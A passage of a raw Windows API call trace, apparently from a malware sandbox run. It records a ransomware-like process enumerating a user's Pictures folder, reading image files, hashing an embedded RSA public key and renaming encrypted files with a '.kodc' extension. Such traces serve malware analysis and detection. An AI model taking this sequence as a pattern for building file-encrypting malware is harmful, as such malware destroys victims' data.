0x331aec8 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.484] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af10 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aef8 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.484] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aef8 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.484] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.485] GetCurrentThreadId () returned 0x42c [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba54f8 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.485] GetCurrentThreadId () returned 0x42c [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.485] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.485] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.486] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.486] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.487] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6798, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.487] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.488] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.488] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.488] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.488] CloseHandle (hObject=0x5cc) returned 1 [0099.492] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EMAWy8841S2yxXM_lme.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\emawy8841s2yxxm_lme.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EMAWy8841S2yxXM_lme.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\emawy8841s2yxxm_lme.bmp.kodc")) returned 1 [0099.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.493] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.494] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b71a340, ftCreationTime.dwHighDateTime=0x1d5b748, ftLastAccessTime.dwLowDateTime=0xcbc9ab60, ftLastAccessTime.dwHighDateTime=0x1d5ba27, ftLastWriteTime.dwLowDateTime=0xcbc9ab60, ftLastWriteTime.dwHighDateTime=0x1d5ba27, nFileSizeHigh=0x0, nFileSizeLow=0xbda2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E_8Yzp r8pR.bmp", cAlternateFileName="E_8YZP~1.BMP")) returned 1 [0099.494] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E_8Yzp r8pR.bmp") returned=".bmp" [0099.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\E_8Yzp r8pR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\e_8yzp r8pr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.495] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=48546) returned 1 [0099.495] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.498] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbd7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.498] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.499] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.499] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xbda2, lpOverlapped=0x0) returned 1 [0099.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.500] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.501] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.501] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.501] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.501] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.501] GetLastError () returned 0x0 [0099.501] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.501] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.501] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.501] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.501] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbda0) returned 0x9ba6d90 [0099.501] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bb18 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bb60 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.502] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af28 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331af10 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.503] GetCurrentThreadId () returned 0x42c [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5588 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.503] GetCurrentThreadId () returned 0x42c [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.503] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.504] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | 